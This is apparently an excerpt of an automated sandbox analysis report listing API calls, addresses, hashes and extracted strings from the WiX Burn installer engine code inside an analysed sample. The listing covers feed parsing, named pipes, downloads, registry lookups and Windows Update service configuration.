• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CodeErrorExitLastThread
                                                                                                                                                                                                                                                                            • String ID: Cache thread exited unexpectedly with exit code: %u.$Failed to execute BUNDLE package.$Failed to execute EXE package.$Failed to execute MSI package.$Failed to execute MSP package.$Failed to execute MSU package.$Failed to execute begin MSI transaction action.$Failed to execute commit MSI transaction action.$Failed to execute dependency action.$Failed to execute package provider registration action.$Failed to execute related bundle.$Failed to execute uninstall MSI compatible package.$Failed to get cache thread exit code.$Failed to wait for cache check-point.$Invalid execute action.$d:\a\wix4\wix4\src\burn\engine\apply.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1352145401-3642936599
                                                                                                                                                                                                                                                                            • Opcode ID: 5f465b7d9fd0ff98be8d5d589a39d77bc6d8ccfc2f3cb4498511d2a589fd0bd2
                                                                                                                                                                                                                                                                            • Instruction ID: 44cc9d9c09af0243ba13dd532685968ed6076fae7c475031879cc002144f3409
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5f465b7d9fd0ff98be8d5d589a39d77bc6d8ccfc2f3cb4498511d2a589fd0bd2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0CB19231A41269BBEF11CE54DC46FAF7B78EB85B54F110065BA04BB2C6E2B19D40CBE0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 0094943E
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to allocate ATOM category label., xrefs: 0094925F
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp, xrefs: 00949206, 00949402, 00949423
                                                                                                                                                                                                                                                                            • Failed to process all ATOM category elements., xrefs: 009493F3
                                                                                                                                                                                                                                                                            • Failed to process all ATOM category attributes., xrefs: 0094932D
                                                                                                                                                                                                                                                                            • Failed to allocate ATOM category scheme., xrefs: 009492A0
                                                                                                                                                                                                                                                                            • label, xrefs: 00949233
                                                                                                                                                                                                                                                                            • term, xrefs: 009492B6
                                                                                                                                                                                                                                                                            • scheme, xrefs: 00949275
                                                                                                                                                                                                                                                                            • Failed get attributes on ATOM unknown element., xrefs: 009491F7
                                                                                                                                                                                                                                                                            • Failed to get child nodes of ATOM category element., xrefs: 00949372
                                                                                                                                                                                                                                                                            • Failed to parse unknown ATOM category element: %ls, xrefs: 00949414
                                                                                                                                                                                                                                                                            • Failed to allocate ATOM category term., xrefs: 00949341
Memory Dump Source
• Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FreeString
                                                                                                                                                                                                                                                                            • String ID: Failed get attributes on ATOM unknown element.$Failed to allocate ATOM category label.$Failed to allocate ATOM category scheme.$Failed to allocate ATOM category term.$Failed to get child nodes of ATOM category element.$Failed to parse unknown ATOM category element: %ls$Failed to process all ATOM category attributes.$Failed to process all ATOM category elements.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp$label$scheme$term
                                                                                                                                                                                                                                                                            • API String ID: 3341692771-530868315
                                                                                                                                                                                                                                                                            • Opcode ID: 6055a5fb8a9f8b2981ecb219dac61370738d930b6dcfb5d9d66f5c117239c328
                                                                                                                                                                                                                                                                            • Instruction ID: 192b308de74cfa33c84fa8394f4825f3eb0bcca3c8ce63eb78c2f715b026a2ae
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6055a5fb8a9f8b2981ecb219dac61370738d930b6dcfb5d9d66f5c117239c328
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9B81FF35A44218FBDF119F94CC4AFAF7779AB85B24F204158F625B72E0DB709A01DB50
                                                                                                                                                                                                                                                                            Strings
Memory Dump Source
• Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: "%ls" /%ls /uninstall /quiet$Comments$Contact$Failed to delete %ls value.$Failed to write %ls value.$HelpLink$HelpTelephone$NoModify$NoRemove$ParentDisplayName$ParentKeyName$QuietUninstallString$SystemComponent$URLInfoAbout$URLUpdateInfo$burn.clean.room$d:\a\wix4\wix4\src\burn\engine\registration.cpp
                                                                                                                                                                                                                                                                            • API String ID: 0-3056233166
                                                                                                                                                                                                                                                                            • Opcode ID: 75b65626944ec8cc82e0c96ab1a084fd176fcf6bc364e11cecefba3918a0387e
                                                                                                                                                                                                                                                                            • Instruction ID: d53ba432939b5e123d29dc700792da3149ed168c2ce6e0d8800f45715ebf5e44
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75b65626944ec8cc82e0c96ab1a084fd176fcf6bc364e11cecefba3918a0387e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F7610331A85769B2DB3299669C0EF7B6C68EBC5F1AF110060FF45FE2D1D5918E40C7A0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 009496EC
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to parse unknown ATOM content element: %ls, xrefs: 00949695
                                                                                                                                                                                                                                                                            • Failed to process all ATOM content attributes., xrefs: 009495B5
                                                                                                                                                                                                                                                                            • Failed to allocate ATOM content type., xrefs: 00949528
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp, xrefs: 009494D3, 009496A4, 009496D5
                                                                                                                                                                                                                                                                            • url, xrefs: 0094953E
                                                                                                                                                                                                                                                                            • Failed to process all ATOM content elements., xrefs: 00949681
                                                                                                                                                                                                                                                                            • Failed to allocate ATOM content scheme., xrefs: 009495C9
                                                                                                                                                                                                                                                                            • type, xrefs: 00949500
                                                                                                                                                                                                                                                                            • crypt32.dll, xrefs: 00949627
                                                                                                                                                                                                                                                                            • Failed to allocate ATOM content value., xrefs: 009496C6
                                                                                                                                                                                                                                                                            • Failed get attributes on ATOM unknown element., xrefs: 009494C4
                                                                                                                                                                                                                                                                            • Failed to get child nodes of ATOM content element., xrefs: 009495FA
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FreeString
                                                                                                                                                                                                                                                                            • String ID: Failed get attributes on ATOM unknown element.$Failed to allocate ATOM content scheme.$Failed to allocate ATOM content type.$Failed to allocate ATOM content value.$Failed to get child nodes of ATOM content element.$Failed to parse unknown ATOM content element: %ls$Failed to process all ATOM content attributes.$Failed to process all ATOM content elements.$crypt32.dll$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp$type$url
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(0001C580,008E73DE,00000000,008E6CF2,00009002,?,000000B0,00000000,00000000,000000B0,?,?,008E6CF2,00000000,00000000), ref: 008FC320
                                                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,?,008E6CF2,00000000,00000000), ref: 008FC32B
                                                                                                                                                                                                                                                                            • SetNamedPipeHandleState.KERNEL32(?,00000000,00000000), ref: 008FC357
                                                                                                                                                                                                                                                                            • ConnectNamedPipe.KERNEL32(?,00000000), ref: 008FC368
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008FC372
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 008FC39E
                                                                                                                                                                                                                                                                            • SetNamedPipeHandleState.KERNEL32(?,00000001,00000000,00000000), ref: 008FC3CF
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008FC4BB
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008FC4F2
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLastNamedPipe$HandleState$ConnectCurrentProcessSleeplstrlen
                                                                                                                                                                                                                                                                            • String ID: Failed to read ACK from pipe.$Failed to reset pipe to blocking.$Failed to set pipe to non-blocking.$Failed to wait for child to connect to pipe.$Failed to write our process id to pipe.$Failed to write secret length to pipe.$Failed to write secret to pipe.$d:\a\wix4\wix4\src\burn\engine\pipe.cpp
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetTempFileNameW.KERNEL32(00000000,000000F6,?,00000000,00000000,00000104,00000000,7FFFFFFF,?,d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dirutil.cpp,00000000,?), ref: 008E4C12
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008E4C20
                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000005,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,?,d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dirutil.cpp,00000000,?), ref: 008E4CB8
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008E4CC5
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorFileLast$CreateNameTemp
                                                                                                                                                                                                                                                                            • String ID: %ls%x.TMP$Failed to allocate buffer for GetTempFileNameW.$Failed to allocate memory for file template.$Failed to allocate temp file name.$Failed to copy temp file string.$Failed to create file: %ls$Failed to create new temp file name.$Failed to create temp file.$Failed to get length of path to prefix.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dirutil.cpp$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\pathutil.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,00000000,00000001,?,?,00910D82,00921FD9,8000FFFF,008E6DA2,00000008,00000000,00000000,?,?,8000FFFF,-000000AB), ref: 00925BB6
                                                                                                                                                                                                                                                                            • GetProcessId.KERNEL32(?,00000000,?,00000001,08000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000004,00000000), ref: 00925CDD
  • Part of subcall function 008FC2ED: lstrlenW.KERNEL32(0001C580,008E73DE,00000000,008E6CF2,00009002,?,000000B0,00000000,00000000,000000B0,?,?,008E6CF2,00000000,00000000), ref: 008FC320
  • Part of subcall function 008FC2ED: GetCurrentProcessId.KERNEL32(?,?,008E6CF2,00000000,00000000), ref: 008FC32B
  • Part of subcall function 008FC2ED: SetNamedPipeHandleState.KERNEL32(?,00000000,00000000), ref: 008FC357
  • Part of subcall function 008FC2ED: ConnectNamedPipe.KERNEL32(?,00000000), ref: 008FC368
  • Part of subcall function 008FC2ED: GetLastError.KERNEL32 ref: 008FC372
  • Part of subcall function 008FC2ED: Sleep.KERNEL32(00000064), ref: 008FC39E
  • Part of subcall function 008FC2ED: SetNamedPipeHandleState.KERNEL32(?,00000001,00000000,00000000), ref: 008FC3CF
• CloseHandle.KERNEL32(00000000,?,000000FF,00910D82,?,00925B00,8000FFFF,00000008,00000000,?,?,00000000,00000000,00000000,00000004,00000000), ref: 00925D7A
• CloseHandle.KERNEL32(00000000,?,000000FF,00910D82,?,00925B00,8000FFFF,00000008,00000000,?,?,00000000,00000000,00000000,00000004,00000000), ref: 00925D8D
Strings
• d:\a\wix4\wix4\src\burn\engine\embedded.cpp, xrefs: 00925C07, 00925D64
• %ls, xrefs: 00925C7B
• Failed to create embedded pipe., xrefs: 00925C27
• Failed to wait for embedded process to connect to pipe., xrefs: 00925CFC
• Failed to wait for embedded executable: %ls, xrefs: 00925D55
• Failed to create embedded process at path: %ls, xrefs: 00925CC6
• Failed to append user args., xrefs: 00925C8F
• Failed to append embedded args., xrefs: 00925C5E
• burn.embedded, xrefs: 00925C42
• Failed to create embedded pipe name and client token., xrefs: 00925BF8
• %ls -%ls %ls %ls %u, xrefs: 00925C4A
• Failed to process messages from embedded message., xrefs: 00925D2B
• .Wu@1Wu, xrefs: 00925D7A, 00925D8D
Memory Dump Source
• Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
Similarity
• API ID: Handle$NamedPipeProcess$CloseCurrentState$ConnectErrorLastSleeplstrlen
• String ID: %ls$%ls -%ls %ls %ls %u$Failed to append embedded args.$Failed to append user args.$Failed to create embedded pipe name and client token.$Failed to create embedded pipe.$Failed to create embedded process at path: %ls$Failed to process messages from embedded message.$Failed to wait for embedded executable: %ls$Failed to wait for embedded process to connect to pipe.$burn.embedded$d:\a\wix4\wix4\src\burn\engine\embedded.cpp$.Wu@1Wu
• API String ID: 732280565-3966042190
• Opcode ID: beac8b37520eeb0eedde5b6b3f9b88a8a5a140fdc9c0d9341dd451a320daa164
• Instruction ID: b960fed09b2c1d6c07d15339e30b87738e721bacae1772a789babd1e74f2d114
• Opcode Fuzzy Hash: beac8b37520eeb0eedde5b6b3f9b88a8a5a140fdc9c0d9341dd451a320daa164
• Instruction Fuzzy Hash: 4851D831A81B29BBDF129F94DC0AFEE7EB4AF04B14F110111F604FA1D4E3B499509B95
APIs
• CreateFileW.KERNEL32(000000FF,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,00000000,00000000,00000078,000000FF,?,?,00000078,00000000), ref: 00947817
• GetLastError.KERNEL32 ref: 00947825
• VirtualAlloc.KERNEL32(00000000,00010000,00003000,00000004), ref: 00947883
• GetLastError.KERNEL32 ref: 00947892
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00947B0C
• CloseHandle.KERNEL32(?), ref: 00947B1B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
Similarity
• API ID: ErrorLastVirtual$AllocCloseCreateFileFreeHandle
• String ID: Content-Length not returned for URL: %ls$Failed to allocate buffer to download files into.$Failed to allocate range request header.$Failed to create download destination file: %ls$Failed to request URL for download: %ls$Failed while reading from internet and writing to: %ls$GET$Range request not supported for URL: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp$.Wu@1Wu
• API String ID: 2028584396-1740225083
• Opcode ID: 4531afadfb00a01e0fee1729d00ef8075513784a0f98a56213c9f521e7fc3853
• Instruction ID: f78622969d58736b91ce163f7c6ec5d5c62c7a1e1563d36c0ca7e0614a1d0bda
• Opcode Fuzzy Hash: 4531afadfb00a01e0fee1729d00ef8075513784a0f98a56213c9f521e7fc3853
• Instruction Fuzzy Hash: 62A17172E48219ABDF21DFE58C85EAEFA79EF48714F114125FA14B7280E7709D00DBA1
APIs
• SysFreeString.OLEAUT32(?), ref: 008F7456
  • Part of subcall function 008E540B: GetProcessHeap.KERNEL32(?,00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E541C
  • Part of subcall function 008E540B: RtlAllocateHeap.NTDLL(00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E5423
• SysFreeString.OLEAUT32(?), ref: 008F7400
Strings
Memory Dump Source
• Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
Similarity
• API ID: FreeHeapString$AllocateProcess
• String ID: Failed to allocate memory for software tag structs.$Failed to convert SoftwareTag text to UTF-8$Failed to get @Filename.$Failed to get @Path.$Failed to get @Regid.$Failed to get SoftwareTag text.$Failed to get next node.$Failed to get software tag count.$Failed to select software tag nodes.$Filename$Path$Regid$SoftwareTag$d:\a\wix4\wix4\src\burn\engine\registration.cpp
• API String ID: 336948655-1873729996
• Opcode ID: 33d85909cbc56b7f9983b048b61e3e3c88e0e8d27d3594f07402c63977c92f63
• Instruction ID: abb36a0050084463f9a7a543054c5594683b82ec874e97fb7715bad8a9238254
• Opcode Fuzzy Hash: 33d85909cbc56b7f9983b048b61e3e3c88e0e8d27d3594f07402c63977c92f63
• Instruction Fuzzy Hash: 4A812771B44318BBEB11DA658C4AFAF7A79FBC5B15F114068FB04FB281E6B0AD009758
APIs
• RegCloseKey.ADVAPI32(00000000,008E7162,008E6DEA,00000000,C95B5EC6,?,?,7D8B5756,?,008E6CF2,00000000,00000000,008E6DEA,008E7162,878D5010,008E6CF2), ref: 008F1737
Strings
• Unsupported registry key value type. Type = '%u', xrefs: 008F1613
• d:\a\wix4\wix4\src\burn\engine\search.cpp, xrefs: 008F15FF, 008F160A, 008F1625, 008F16FB
• Failed to change value type., xrefs: 008F16C0
• Registry value not found. Key = '%ls', Value = '%ls', xrefs: 008F15AC
• RegistrySearchValue failed: ID '%ls', HRESULT 0x%x, xrefs: 008F170F
• Registry key not found. Key = '%ls', xrefs: 008F156E
• Failed to format key string., xrefs: 008F14C9
• Failed to query registry key value., xrefs: 008F15C3
• Failed to set variable., xrefs: 008F16E9
• Failed to read registry value., xrefs: 008F169A
• Failed to open registry key., xrefs: 008F1550
• Failed to format value string., xrefs: 008F14FB
Memory Dump Source
• Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                            • String ID: Failed to change value type.$Failed to format key string.$Failed to format value string.$Failed to open registry key.$Failed to query registry key value.$Failed to read registry value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchValue failed: ID '%ls', HRESULT 0x%x$Unsupported registry key value type. Type = '%u'$d:\a\wix4\wix4\src\burn\engine\search.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3535843008-3422224897
                                                                                                                                                                                                                                                                            • Opcode ID: 1d2d9dd8c653d72a38e1b6deb1a9978a0c0b6916714a9bc8acb87767391e9173
                                                                                                                                                                                                                                                                            • Instruction ID: 17d67bbb0f2ba57a0184d92a4f1b4662a1f234efedfbb7513796542081b2152e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1d2d9dd8c653d72a38e1b6deb1a9978a0c0b6916714a9bc8acb87767391e9173
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B981E331E4061EFBDF12AAA58D4AFBEBA79FF18714F110121FB04F6191E2719E109B91
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000200,00000000,?,00000044,?,?,?,?,?), ref: 008EE651
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?), ref: 008EE65B
                                                                                                                                                                                                                                                                            • WaitForInputIdle.USER32(?,?), ref: 008EE6BF
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 008EE708
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 008EE71A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseHandle$CreateErrorIdleInputLastProcessWait
                                                                                                                                                                                                                                                                            • String ID: "%ls"$"%ls" %s$D$Failed to CreateProcess on path: %ls$Failed to create executable command.$Failed to create obfuscated executable command.$Failed to format argument string.$Failed to format obfuscated argument string.$d:\a\wix4\wix4\src\burn\engine\approvedexe.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 1086122317-729562610
                                                                                                                                                                                                                                                                            • Opcode ID: 6e3addf906dee40421183d22af20d9da325d185b994e5389ddc1079964c841dc
                                                                                                                                                                                                                                                                            • Instruction ID: 285919f6dff088950b64c4cdb36571d85146682c3e8a06985589407f4345a28d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e3addf906dee40421183d22af20d9da325d185b994e5389ddc1079964c841dc
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8671D07190025ABBDB129B96CC46F9EBB78FF16744F004025FA04F61A0E3709E50DB91
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,08000080,00000000,?,?,?,?,00000000,00000000), ref: 00920334
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00920342
                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000007,00000000,00000002,08000080,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?), ref: 009203E5
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 009203F3
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,Function_0003FC40,?), ref: 009204C1
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 009204D0
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                                            • String ID: BA aborted copy of payload from: '%ls' to: %ls.$Failed attempt to copy payload from: '%ls' to: %ls.$Failed to open destination file to copy payload from: '%ls' to: %ls.$Failed to open source file to copy payload from: '%ls' to: %ls.$Failed to prepare payload destination path: %ls$Failed to read from start of source file to copy payload from: '%ls' to: %ls.$copy$d:\a\wix4\wix4\src\burn\engine\apply.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 2528220319-3784852467
                                                                                                                                                                                                                                                                            • Opcode ID: c103c88ac3febc98394b5f1720064fb4beb1473f43b4ba89e5fca251c1f84b0d
                                                                                                                                                                                                                                                                            • Instruction ID: 732ff35d3588cd96d432a03a8b7d55332816010c48da27b5d4b0ded80cf6e475
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c103c88ac3febc98394b5f1720064fb4beb1473f43b4ba89e5fca251c1f84b0d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A9512A32A41339B7E7219A559C4AF6F396CFFC6B60F114105FA14BB2D2E2B49C0196A1
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,00000000,?,?,?,?,?,?,?,?,?,00919D0A,?), ref: 0091972C
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00919D0A,?,?,?), ref: 0091973B
                                                                                                                                                                                                                                                                            • OpenServiceW.ADVAPI32(00000000,wuauserv,00000027,?,?,?,?,?,?,?,?,00919D0A,?,?,?), ref: 00919795
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00919D0A,?,?,?), ref: 009197A1
                                                                                                                                                                                                                                                                            • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,00919D0A,?,?,?), ref: 009197E9
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00919D0A,?,?,?), ref: 009197F3
                                                                                                                                                                                                                                                                              • Part of subcall function 009198F9: ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000003,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00919898,00000000,00000003), ref: 00919910
                                                                                                                                                                                                                                                                              • Part of subcall function 009198F9: GetLastError.KERNEL32(?,00919898,00000000,00000003,00000000,?,?,?,?,?,?,?,?,?,00919D0A,?), ref: 0091991A
                                                                                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 009198D5
                                                                                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 009198E0
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Service$ErrorLast$CloseHandleOpen$ChangeConfigManagerQueryStatus
                                                                                                                                                                                                                                                                            • String ID: Failed to mark WU service to start on demand.$Failed to open WU service.$Failed to open service control manager.$Failed to query status of WU service.$Failed to read configuration for WU service.$d:\a\wix4\wix4\src\burn\engine\msuengine.cpp$wuauserv
                                                                                                                                                                                                                                                                            • API String ID: 2017831661-2546018573
                                                                                                                                                                                                                                                                            • Opcode ID: b6f036396604859bad3c3726abfaa49ec34a7baa21868610d3d8867bb90050c3
                                                                                                                                                                                                                                                                            • Instruction ID: 8b6af2debe15823e1b933d66b188a59927e989de618d4bd2a9a5ec1e0ec98a14
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b6f036396604859bad3c3726abfaa49ec34a7baa21868610d3d8867bb90050c3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5151F836F40328A7E721DB698C59FEF7AB8AF46B10F154164FE05BB2C1D675DC4086A0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,?,?), ref: 008E446B
                                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000001,?,?,?), ref: 008E447A
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?), ref: 008E4484
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?), ref: 008E44C9
                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00000105,?,?,?), ref: 008E4509
